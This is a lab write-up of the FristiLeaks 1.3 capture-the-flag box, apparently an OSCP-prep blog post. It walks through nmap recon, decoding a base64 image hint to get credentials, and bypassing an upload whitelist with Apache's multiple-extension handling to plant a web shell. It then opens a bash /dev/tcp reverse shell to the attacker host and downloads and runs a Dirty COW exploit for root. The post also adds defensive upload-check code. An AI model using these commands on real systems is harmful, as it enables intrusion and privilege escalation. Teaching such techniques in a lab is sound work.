OSCP prep, OSCP series: the FristiLeaks_1.3 lab
FristiLeaks_1.3 is rated an easy box.
- Tests information gathering, with a bit of a CTF flavour; the hints eventually lead to the upload location
- Uses Apache's multiple-extension handling to bypass the upload whitelist
- Finishes with Dirty COW (CVE-2016-5195) privilege escalation
Download:
https://pan.quark.cn/s/26e1cb6958fc
nmap
Host discovery
└─# nmap -sn 192.168.80.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:22 CST
Nmap scan report for 192.168.80.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.2
Host is up (0.00030s latency).
MAC Address: 00:50:56:E1:35:E6 (VMware)
Nmap scan report for 192.168.80.131
Host is up (0.00052s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.80.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:FF:44:91 (VMware)
Nmap scan report for 192.168.80.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 25.04 seconds
Port scan
Two full-range scans were run; only port 80 is open. The split between "no-response" and "host-prohibited" filtered ports differs between the runs (the box answers some probes with ICMP admin-prohibited, and at --min-rate 10000 fewer of those replies are captured), which is why a second pass at a lower rate is a cheap sanity check; the open-port result is the same in both.
┌──(root㉿kali)-[/home/kali/桌面/nmap]
└─# nmap --min-rate 10000 -p- 192.168.80.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:25 CST
Nmap scan report for 192.168.80.131
Host is up (0.00085s latency).
Not shown: 65515 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 23.66 seconds
┌──(root㉿kali)-[/home/kali/桌面/nmap]
└─# nmap --min-rate 5000 -p- 192.168.80.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:28 CST
Nmap scan report for 192.168.80.131
Host is up (0.0014s latency).
Not shown: 65502 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 36.53 seconds
Detailed scan of port 80
└─# nmap -sV -sC -sT -O -p80 192.168.80.131 -oA fl1.3/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:45 CST
Nmap scan report for 192.168.80.131
Host is up (0.0014s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
| http-methods:
|_ Potentially risky methods: TRACE
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds
vuln script scan
└─# nmap --script=vuln -p80 192.168.80.131 -oA fl1.3/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:47 CST
Nmap scan report for 192.168.80.131
Host is up (0.00087s latency).
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /robots.txt: Robots file
| /icons/: Potentially interesting folder w/ directory listing
|_ /images/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 108.07 seconds
Directory scan
nmap and the directory brute-force together turned up:
/robots.txt
/icons/
/images/
Port 80
robots.txt
It lists three disallowed paths; let's look at each of them:
Disallow: /cola
Disallow: /sisi
Disallow: /beer
The /images folder has directory listing enabled but contains nothing useful.
/sisi and /beer serve the same page as /cola.
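The "the other two show the same thing as /cola" observation can be made mechanical. The following is an added example, not part of the original write-up: it parses the Disallow entries out of robots.txt and groups the paths by response status and body hash, so identical pages cluster together. The robots.txt text is a constructed stand-in for the box's file; only fetch() touches the network, and the lab address 192.168.80.131 from the scan is assumed reachable when it is run live.

```python
import hashlib
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Constructed stand-in for the box's robots.txt (the three entries nmap reported).
SAMPLE_ROBOTS = """User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer
"""


def parse_disallow(text):
    """Return the Disallow paths in file order, skipping comments, blanks and repeats."""
    paths = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line.lower().startswith("disallow:"):
            continue
        value = line.split(":", 1)[1].strip()
        if value and value not in paths:
            paths.append(value)
    return paths


def fetch(base, path, timeout=5):
    """GET base+path and return (status, body); the only function here that touches the network."""
    try:
        with urllib.request.urlopen(urljoin(base, path), timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def group_by_body(responses):
    """{path: (status, body)} -> {"status:sha256prefix": [paths]} so identical pages cluster."""
    groups = {}
    for path, (status, body) in responses.items():
        key = f"{status}:{hashlib.sha256(body).hexdigest()[:16]}"
        groups.setdefault(key, []).append(path)
    return groups


def triage(base, robots_text, fetcher=fetch):
    """Fetch every disallowed path and report which ones are really the same page."""
    responses = {p: fetcher(base, p) for p in parse_disallow(robots_text)}
    return group_by_body(responses)


if __name__ == "__main__":
    # Live run against the lab box (IP assumed from the nmap sweep above).
    base = "http://192.168.80.131/"
    status, body = fetch(base, "/robots.txt")
    if status == 200:
        for key, paths in triage(base, body.decode(errors="replace")).items():
            print(key, paths)
```

Paths that land in the same group are the same page byte for byte, which is exactly the case with /cola, /sisi and /beer here; a path in a group of its own is the one worth a closer look.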
The /icons directory
Also has directory listing, but it is all icon images, nothing of interest.
A separate directory brute-force against it likewise turns up only images.
The hint
That did not work as written; trying it in lowercase, fristi, the page loads.
File upload vulnerability
Log in following the hint
Once there, also tried weak passwords and SQL injection against the login form; neither works.
Viewing the page source reveals a hint:
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
Base64-decoding it yields an image
which reads
keKkeKKeKKeKkEkkEk
Putting the two together,
eezeepz
keKkeKKeKKeKkEkkEk
look like a username and password.
Login succeeds
and exposes a file upload form.
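Rather than pasting the blob into an online decoder, the carving above can be scripted. This is an added example, not code from the original write-up: it pulls base64 runs out of the page source (tolerating the line wrapping seen above), decodes them, and confirms the result is a PNG by checking the signature and parsing the IHDR chunk before writing it out. The HTML below is constructed; the base64 line is the first 44 characters of the blob shown on the page, truncated after IHDR, so only the header decodes here.

```python
import base64
import re
import struct

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Constructed page source. The base64 line is the first 44 characters of the blob
# from the page, cut after the IHDR chunk, so only the header is present.
SAMPLE_HTML = """<html><body>
<!-- TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHq
-->
</body></html>"""


def extract_base64_blobs(html, min_len=40):
    """Return candidate base64 runs found in the source, longest first.
    Runs may be wrapped across lines, so whitespace between chunks is tolerated and stripped."""
    runs = re.findall(r"(?:[A-Za-z0-9+/]{20,}\s*)+={0,2}", html)
    cleaned = [re.sub(r"\s+", "", r) for r in runs]
    return sorted((c for c in cleaned if len(c) >= min_len), key=len, reverse=True)


def png_header(data):
    """(width, height, bit_depth, color_type) if data starts with a PNG signature and IHDR, else None."""
    if not data.startswith(PNG_SIG) or len(data) < 33:
        return None
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        return None
    width, height, depth, color = struct.unpack(">IIBB", data[16:26])
    return width, height, depth, color


def carve_hint(html):
    """Decode each candidate blob and return (bytes, header) for the first one that is a PNG."""
    for blob in extract_base64_blobs(html):
        try:
            data = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError: not base64 after all
            continue
        header = png_header(data)
        if header:
            return data, header
    return None, None


if __name__ == "__main__":
    data, header = carve_hint(SAMPLE_HTML)
    if header:
        width, height, depth, color = header
        print(f"PNG {width}x{height}, bit depth {depth}, colour type {color}")
        with open("hint.png", "wb") as fh:  # then open it in an image viewer
            fh.write(data)
```

Run against the real page source (the full blob, not the truncated prefix) the same function writes a complete image; the signature and IHDR check is what tells you it is worth opening in a viewer rather than, say, a zip or a second layer of base64.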
File upload
Trying an upload shows that the form enforces an extension whitelist.
Check the PHP version and web server: the nmap banner already gave Apache/2.2.15 (CentOS) with PHP/5.3.3.
Given those versions, two things are worth trying: %00 truncation and Apache's multiple-extension handling.
%00 truncation
Preconditions:
1. PHP version below 5.3.4
2. magic_quotes_gpc set to Off in php.ini
Apache multiple-extension handling
Apache 1.x and 2.x let a file carry several extensions, and mod_mime evaluates all of them. When PHP is mapped with AddHandler (for example AddHandler php5-script .php, the form used by the stock php.conf on CentOS 6), a request like
www.xxxx.com/apache.php.bbb.aaa
is handled as follows: each extension after the basename is looked up; extensions Apache does not recognise (aaa, bbb) are simply ignored; among the recognised ones, the right-most that sets a handler wins. Here .php is the only extension that maps to a handler, so apache.php.bbb.aaa is executed as PHP. By the same rule a name such as webshell.php.png runs as PHP while still passing a whitelist that only looks at the final extension. This is a configuration weakness rather than an Apache bug: mapping the handler with <FilesMatch "\.php$"> SetHandler application/x-httpd-php </FilesMatch> only fires when .php is the last extension and closes the bypass.
Trying %00 truncation: fails.
Trying the Apache multiple-extension trick: succeeds.
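The whitelist check and the mod_mime rule described above, as an added example that is not code from the box or from the original write-up: weak_whitelist() mirrors a check that inspects only the final extension, mod_mime_handler() models how Apache chooses a handler under an AddHandler mapping (the handler map is assumed, in the spirit of AddHandler php5-script .php), and hardened_check() together with stored_name() show the fix, rejecting any non-image extension anywhere in the name, sniffing the bytes, and storing under a server-chosen name. The sample bytes are constructed.

```python
import os
import secrets

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
MAGIC = {  # leading bytes -> image kind
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
# Assumed handler map, standing in for "AddHandler php5-script .php" style directives.
HANDLERS = {"php": "php5-script", "cgi": "cgi-script"}


def weak_whitelist(filename):
    """The flawed check: only the text after the last dot is examined,
    so shell.php.png -> 'png' -> accepted."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED_EXT


def mod_mime_handler(filename, handlers=HANDLERS):
    """Model of mod_mime under AddHandler: every dotted segment after the basename is
    looked up, unknown segments are ignored, and the right-most segment that maps to a
    handler wins. shell.php.png therefore still goes to the PHP handler."""
    chosen = None
    for seg in filename.split(".")[1:]:
        chosen = handlers.get(seg.lower(), chosen)
    return chosen


def sniff_type(data):
    """Image kind from leading bytes, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def hardened_check(filename, data):
    """Return (ok, reason). Rejects double extensions, non-image bytes and name/content mismatch."""
    segs = os.path.basename(filename).lower().split(".")
    if len(segs) < 2 or segs[0] == "":
        return False, "no usable name/extension"
    bad = [s for s in segs[1:] if s not in ALLOWED_EXT]
    if bad:
        return False, f"disallowed extension(s): {bad}"
    kind = sniff_type(data)
    if kind is None:
        return False, "content is not a known image"
    claimed = "jpg" if segs[-1] == "jpeg" else segs[-1]
    if claimed != kind:
        return False, f"extension {segs[-1]} does not match content {kind}"
    return True, kind


def stored_name(data):
    """Server-chosen name: random stem, extension taken from the sniffed content, never from the client."""
    kind = sniff_type(data)
    if kind is None:
        raise ValueError("refusing to store non-image content")
    return f"{secrets.token_hex(8)}.{kind}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed: PNG signature plus filler
    for name in ("photo.png", "shell.php.png", "shell.png.php", "apache.php.bbb.aaa"):
        print(f"{name:20} whitelist={weak_whitelist(name)!s:5} "
              f"handler={mod_mime_handler(name)} hardened={hardened_check(name, png)}")
```

Even with the hardened check, keep the upload directory out of the handler's reach (php_admin_flag engine off or a FilesMatch-based handler mapping, and no execute permission on the directory), so a bypass of the name check alone does not give code execution.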
AntSword connection + reverse shell
Reverse shell
With a listener waiting on the attacker box (for example nc -lvnp 7777 on 192.168.80.129), run from the web shell:
bash -c 'exec bash -i &>/dev/tcp/192.168.80.129/7777 <&1'
Method 1: Dirty COW privilege escalation
Check the kernel version
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64
This CentOS 6 kernel predates the Dirty COW (CVE-2016-5195) fix, so the exploit is worth a try:
wget http://192.168.80.129/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty 123456
The exploit writes a uid-0 user named firefart into /etc/passwd with the password supplied on the command line and backs the original file up to /tmp/passwd.bak; restore it once you are done, and expect the race to leave the kernel unstable on some runs. When it reports success, switch user with su:
bash-4.1$ su firefart
su firefart
Password: 123456
[firefart@localhost tmp]# id
id
uid=0(firefart) gid=0(root) groups=0(root)
[firefart@localhost tmp]#
From: https://blog.csdn.net/2202_75361164/article/details/144754819